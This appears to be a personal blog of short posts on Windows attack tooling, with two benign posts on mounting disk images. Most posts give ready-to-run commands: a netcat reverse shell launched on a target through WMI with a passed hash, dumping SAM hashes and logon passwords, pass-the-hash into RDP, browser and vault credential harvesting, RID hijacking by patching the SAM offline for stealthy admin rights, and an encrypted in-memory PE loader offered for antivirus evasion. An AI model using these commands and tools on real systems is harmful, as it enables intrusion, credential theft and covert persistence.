Oct 282019
 

In a previous article, we have seen how to perform lateral movement thru « Pass The Hash ».

Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Lets use a reverse shell i.e the target will connect back to us (the attacker).

Usefull as well if the firewall on the target is allowing only outbound connections.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

Oct 282019
 

Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).

1.Retrieve the hash
NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

2.Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

You will end up logged as the « username » account in a RDP console on server named « target ».

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

And you never had to enter the « username » password…

Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)

This will be covered in future articles.

Oct 282019
 

Dont ask about the name : yes it does not mean much but this is all I got so far…

A tribute to https://github.com/gentilkiwi/mimikatz
And generally speaking a tool to handle windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.

Source code on github here.

Command line so far:

Command line as below:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /dumphash /rid:123 [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /runwmi /binary:c:\folder\bin.exe [/server:hostname]
NTHASH /enumpriv
NTHASH /dumpprocess /pid:12345
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /a_command /verbose
NTHASH /a_command /system

Août 182019
 

Following a post here on how to blank an account’s password using offlinereg, this time, lets see how to perform « RID hijacking ».

The local admin account has a 01F4 rid.
What about « patching » another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite « stealthy » as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy…

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.

 

Download/Discuss it here

Juil 252019
 

Create your own filesystem and mount it as either a logical drive or folder. Dokan (https://github.com/dokan-dev/dokany)

Below a simple command line to mount a zip archive on X:
mount.exe /r test.zip /l x /x proxy_7zip.dll

Mount.exe is a generic code/binary independant of the filesystem you wish to create.
The filesystem is implemented in a proxy/dll.

Source code and binaries is available here.

7zip proxy example is here.

NFS proxy example is here.

Screenshot

Juil 252019
 

I had done a few proxies for ImDisk in the past based on the libyal libraries (vmdkqcowvhdewf).

This time, as the VDI image format is quite simple, I made my own proxy for VDI images.

Imdisk + Discutils could achieve the same except that discutils requires .Net 4.0 which is not always available.

As always the command line :

« server » -> devio –dll=proxy.dll;dllopen shm:test_proxy c:\temp\freedos.vdi
« client » -> imdisk -a -t proxy -o shm -o ro -f test_proxy -m x:
Use the start command in front of devio if you want to stuff it all in one batch.

Download/Discuss here.

Juil 222019
 

A demo to run a encrypted xored encrypted PE within the memory of another PE (and therefore possibly bypass anti virus softwares)

See https://github.com/erwan2212/XOR-freepascal about xoring / encrypting a file.

Code is currently set to use cmd.exe (x86/x64) as target host.

host32.exe/host64.exe are also provided in the zip if you wish the modify the code to use a « neutral » host.

Source code and binaries can be found here.